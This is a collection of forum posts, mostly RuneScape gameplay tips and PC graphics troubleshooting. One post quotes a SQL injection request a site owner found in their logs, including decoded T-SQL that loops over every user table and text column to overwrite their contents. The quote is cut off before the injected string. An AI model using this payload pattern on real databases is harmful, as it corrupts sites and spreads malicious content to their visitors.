  1. Can you do this after the quest? Wouldn't know; I did it during the quest (read it on RSOF).
  2. Take a redberry pie with you when you go see Ramarno. Being the pie-eating Imcando dwarf he is, will reward you with 1000 smithing xp. Alas, the forge seems to be useless after the quest.
  3. The clue digging spot is behind the building, and definitely outside. 100% certain, final answer, Regis.
  4. I find it quite interesting that you were the first person (i think) to catch that mistake this whole thread XD ~Dan well idk if it has changed but when i went there the name of the creature that atacked you was "tortured soul" Tortured Souls spawn near the Ectofuntus and are well-known seed droppers.
  5. I think you mean "tormented wraith" instead of "tortured soul."
  6. I'm in my 130s, been playing since Classic and haven't seen one, either. I think it's all some grand prank and there really is no such thing as a Champions Scroll. It has nothing at all to do with being a Champion, really. It has more to do with compulsively killing thousands of something in a vain attempt to hit 3 cherries on the slot machine. :P
  7. They are also dropped by tormented wraiths, though it does not seem to be very common.
  8. Search the RSOF for "wraith" - I tried attacking it and couldn't bring myself to (or some such). The story is you have to be wearing full black armor & weapon to attack it. Didn't try myself. QuickFind: 15-16-243-57617461 There's a spirit inside the chaos altar portal who speaks of people with scrambled names (Mokazra, Lamreg, Tighux, Garel, Lamel, Urgand) and speaks of a sword finding its new home. If you bust the improsoned rogue in Rogue's Castle out of jail (using the portal, of course), he flees to a building behind the archery shop in Varrock. You can then sell unenchanted jewelry to him for the high alchemy price.
  9. Almost every game you buy for Windows nowadays has DirectX stashed on the installation disks. You probably already have game disks that have DirectX somewhere on them. I know the FS10 DVDs have DirectX9 on them - I've used them to upgrade DirectX on Win98 systems. :P A lot of freebie disks (think any "Try AOL for free") have DirectX and the latest IE stashed somewhere on them. Elsewise, you need to bite the bullet and google "directx redist" for a version you can burn to CD and hide for future use (such as: http://www.microsoft.com/Downloads/deta ... laylang=en).
  10. Rejoice, farmers! Calquat seed prices are indeed cratering. Apparently the market believes they were indeed overpriced in the 50K range.
  11. uhm can't you always get a second 1 lol.. I own waaay to many hats/boots already (15 of each) Once you have a complete set on you / in your bank, you will stop getting drops. You'll get snail meat or guthix pots instead. But putting your suit in your house fools the game into giving you clothes drops again.
  12. It takes longer than it is worth. Take Route 1, evade everything you don't want to do and repeat. If you put your full lumberjack suit in your POH, you can get a second one. \
  13. If there was such a place as Hell and a crack in the ground opened up so that the denizens of Hell could walk the surface of the Earth, I expect a cloud of those red-eyed winged cicadas would be the first thing to fly out. Did I mention that I hate cicadas?
  14. It's time someone precipitated on this penguin parade of praise. I spoke to Larry today and got more than 10 different hints. Interesting, since there are only 10 penguins spying at a time. Even when you throw out the vague "there is a penguin somewhere in Runescape" clue, there is still overlap. The chats are a joke. People are offering where penguins were on different worlds and several days in the past. You are just as well to wander around and find them yourself. For instance, today we found one at Eagle's Peak - a location not listed in any of those "guides" that are proliferating on the RSOF. Larry specifically mentioned "Eagle's Peak" in his hint to me. But when I got there, it was a penguin I had already spied on and not one of the 2 I am missing. :wall: :wall: :wall: Larry should stop offering clues to penguins that have already been found - it would improve things greatly.
  15. Yeah they were super cheap xp - I am down to my last 50 and wishing I had 200 more. But I'm not paying the current market price for them.
  16. Do they only go in the mines? Sorry feeling very stupid here. :wall: They do tend to fall near surface mines or banks.
  17. It sounds like lumberjack suits all over again.
  18. Back to the subject... This adze automagically breaks away when the tree becomes an ent  You get a box that says you need an axe to chop the tree. My guess is Bob hasn't been set up yet to repair the adze and it's probably a temporary perk.
  19. Can't you just drop a charm and another item on the ground and see how they stack? That should give you a pretty good idea of the Jagex assigned value of a charm (since you can't alch them).
  20. People are always commenting that they don't do clues anymore, so of course the supply of pages has gone down.
  21. The obvious substitute for having your house portal in Canafis would be to use a ring of slaying to teleport to Morytania Slayer Tower. EDIT OK I finished my run in 11 minutes. I filled all the beacons and made all my payment ahead of time Here's my chosen route: (1) I dipped in the goblin pool (2) Trollheim telly --> GWD. As I suspected, my run stats stayed at 100%. So I started here and didn't have that long walk counted against me. (3) Down the agility shortcut to wildy and ran north along the edge, getting #13 and #14. I then ran south and got #10. Luckily, I encountered no revs. (4) Trollheim telly --> the beacon next to the wildy agility shortcut there (5) Burthorpe necklace telly --> the beacon there (6) Goblin sphere telly ---> the beacon there (7) Morytania ring telly ---> Paterdomus and through the agility railings. It was then a simple straight run across to Edge, hitting the remaining beacons. I finished at Black Knights.
  22. Thanks for the info. The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet. 141.158.58.64
  23. They are all on the world map, but basically it's along the northern side of Varrock and then it goes north along the west edge of the Wild. These fire tenders are wanting things - the one named Ude asked me for a white fruit.
  24. I run a small niche site (nothing to do with Runescape or gaming). Tonight, while looking at my logs, I noticed someone trying to reach a strange URL: http://[my site url was here]/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152 ... After decoding all that hex, I got this: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">
  25. Your OpenGL support is knackered. That card is more than sufficient. Here's a utility that will show you your OpenGL settings for Windows XP (here's a different utility for those of us with older operating systems). I have found that if your system supports OpenGL 1.5 or higher, you can run Runescape in FS/HD mode. I got it to run FS/HD on a Windows 98/SE machine with Java 1.4.2_18, an AMD Athlon 900MHz processor, a Geforce2 GTS 64MB card and Forceware 71.84. --------------------------- GLEW Extension Info --------------------------- GLEW version 1.5.0 Reporting capabilities of pixelformat 1 Running on a GeForce2 GTS/PCI/3DNOW! from NVIDIA Corporation OpenGL version 1.5.3 is supported If you are running higher than 71.84, then it's something else that is causing your problem. :? BTW, DirectX has nothing to do with Runescape - it uses OpenGL on all platforms (Windows, Mac, Linux).
